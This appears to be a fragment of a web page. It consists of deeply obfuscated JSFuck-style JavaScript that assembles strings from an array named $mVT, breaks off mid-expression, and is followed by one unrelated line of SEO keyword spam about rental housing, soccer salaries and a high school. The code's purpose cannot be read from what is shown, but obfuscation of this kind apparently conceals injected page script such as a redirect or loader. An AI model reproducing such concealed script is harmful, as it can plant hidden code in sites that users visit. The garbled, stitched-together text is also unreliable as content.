+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[18]+$mVT[41]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[39]+$mVT[21]+$mVT[30]+$mVT[2]+$mVT[2]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[44]+$mVT[4]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[41]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[14]+$mVT[46]+$mVT[44]+$mVT[13]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[26]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[17]+(![]+[])[!+[]+!+[]]+$mVT[38]+$mVT[5]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[12]+$mVT[46]+$mVT[21]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[41]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[35]+$mVT[46]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[46]+(![]+[])[!+[]+!+[]]+$mVT[16]+([]+[]+{})[!+[]+!+[]]+$mVT[46]+$mVT[25]+$mVT[+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[42]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[8]+$mVT[28]+$mVT[1]+$mVT[20]+$mVT[14]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[4]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[4]+([![]]+{})[+!+[]+[+[]]]+([]+[]+[][[]])[!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$mVT[46]+$mVT[45]+$mVT[20]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[19]+$mVT[+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+$mVT[+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[2]+(!![]+[])[+!+[]]+$mVT[0]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$mVT[37]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[22]+$mVT[3]+$mVT[7]+$mVT[36]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$mVT[37]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$mVT[27]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$mVT[(+[])]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[40]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[36]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[2]+(!![]+[])[+!+[]]+$mVT[(+[])]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[42]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[25]+(!![]+[])[+[]]+$mVT[3]+$mVT[40]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+(![]+[])[!+[]+!+[]+!+[]]+(!!

Section 8 Houses For Rent In Fort Pierce, Fl, Nwsl Head Coach Salary, Warren Warriors High School, Articles K